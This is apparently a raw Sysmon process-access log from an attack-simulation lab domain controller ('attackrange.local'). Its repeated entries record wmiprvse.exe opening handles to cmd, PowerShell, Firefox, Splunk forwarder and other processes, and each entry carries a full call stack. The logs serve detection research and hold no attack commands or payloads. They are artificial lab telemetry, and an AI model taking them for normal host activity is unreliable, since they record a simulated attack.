12:18:52.758{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-4DA8-618D-73D3-04000000F101}4464C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349807Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.758{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-2718-618C-BDB0-04000000F101}3812C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349806Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.758{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-2718-618C-BCB0-04000000F101}2320C:\windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349805Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.758{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-0C90-618C-C1AA-04000000F101}5016C:\Windows\system32\fontdrvhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349804Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.758{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-BC2E-618B-B6A0-04000000F101}8728C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349803Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.758{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349802Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.758{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-BB96-618B-7AA0-04000000F101}7856C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349801Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.758{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-BB8B-618B-50A0-04000000F101}9212C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349800Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.758{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349799Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.758{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-EC4D-6172-7BB6-01000000F101}9996C:\Windows\Notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349798Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.758{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-EC34-6172-7AB6-01000000F101}9316C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349797Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.758{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-EC34-6172-79B6-01000000F101}8640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349796Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-EC2E-6172-77B6-01000000F101}9380C:\Windows\Notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349795Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-E8B4-6172-0DB6-01000000F101}1204C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349794Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-E4CD-6172-AAB2-01000000F101}9240C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349793Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-C662-6171-B490-01000000F101}6664C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349792Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-BFC4-6171-ED8F-01000000F101}4284C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349791Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-BF5B-6171-DE8F-01000000F101}6860C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349790Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-BF19-6171-D68F-01000000F101}920C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349789Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-BB7B-6171-698F-01000000F101}6612C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057349788Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.743{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-7550-6171-1787-01000000F101}912C:\Program Files\Mozilla 